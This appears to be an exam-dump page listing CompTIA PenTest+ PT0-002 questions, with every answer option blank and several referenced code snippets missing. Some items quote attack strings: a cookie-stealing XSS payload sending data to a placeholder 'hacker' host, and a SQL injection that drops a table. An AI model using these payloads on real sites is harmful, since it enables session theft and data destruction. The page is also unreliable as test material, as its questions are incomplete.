5/5 - (1 vote)

[Feb-2024] PT0-002 Dumps are Available for Instant Access using ActualCollection

PT0-002 Dumps 2024 – New CompTIA PT0-002 Exam Questions

CompTIA PT0-002 certification exam covers several areas, including planning and scoping, information gathering, vulnerability identification, exploitation, post-exploitation, and reporting. It also covers various concepts, such as network reconnaissance, web application testing, wireless network testing, social engineering, and physical security testing. PT0-002 exam consists of 85 multiple-choice and performance-based questions, and the candidate has 165 minutes to complete it. The passing score for the exam is 750 out of 900, and the certification is valid for three years.

 

NO.117 Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables?

 
 
 
 

NO.118 A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

 
 
 
 

NO.119 In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company’s servers. Which of the following actions would BEST enable the tester to perform
phishing in a later stage of the assessment?

 
 
 
 

NO.120 A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following combinations of tools would the penetration tester use to exploit this script?

 
 
 
 

NO.121 A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement. Which of the following is the BEST option for the tester to take?

 
 
 
 

NO.122 A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company’s network. Which of the following accounts should the tester use to return the MOST results?

 
 
 
 

NO.123 A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
* The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:

Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)

 
 
 
 
 
 

NO.124 Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

 
 
 
 
 
 

NO.125 A penetration tester conducted an assessment on a web server. The logs from this session show the following:
http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ‘ ; DROP TABLE SERVICES; —
Which of the following attacks is being attempted?

 
 
 
 
 

NO.126 A penetration tester created the following script to use in an engagement:

However, the tester is receiving the following error when trying to run the script:

Which of the following is the reason for the error?

 
 
 
 

NO.127 A private investigation firm is requesting a penetration test to determine the likelihood that attackers can gain access to mobile devices and then exfiltrate data from those devices. Which of the following is a social-engineering method that, if successful, would MOST likely enable both objectives?

 
 
 
 

NO.128 Given the following script:
while True:
print (“Hello World”)
Which of the following describes True?

 
 
 
 

NO.129 A penetration tester downloaded a Java application file from a compromised web server and identifies how to invoke it by looking at the following log:

Which of the following is the order of steps the penetration tester needs to follow to validate whether the Java application uses encryption over sockets?

 
 
 
 

NO.130 A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

 
 
 
 

NO.131 A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following combinations of tools would the penetration tester use to exploit this script?

 
 
 
 

NO.132 Given the following code:
<SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

 
 
 
 
 
 

NO.133 Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?

 
 
 
 

NO.134 A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

 
 
 
 

CompTIA PT0-002 Exam Practice Test Questions: https://www.actualcollection.com/PT0-002-exam-questions.html

Related Links: www.stes.tyc.edu.tw myportal.utt.edu.tt www.stes.tyc.edu.tw myportal.utt.edu.tt myportal.utt.edu.tt myportal.utt.edu.tt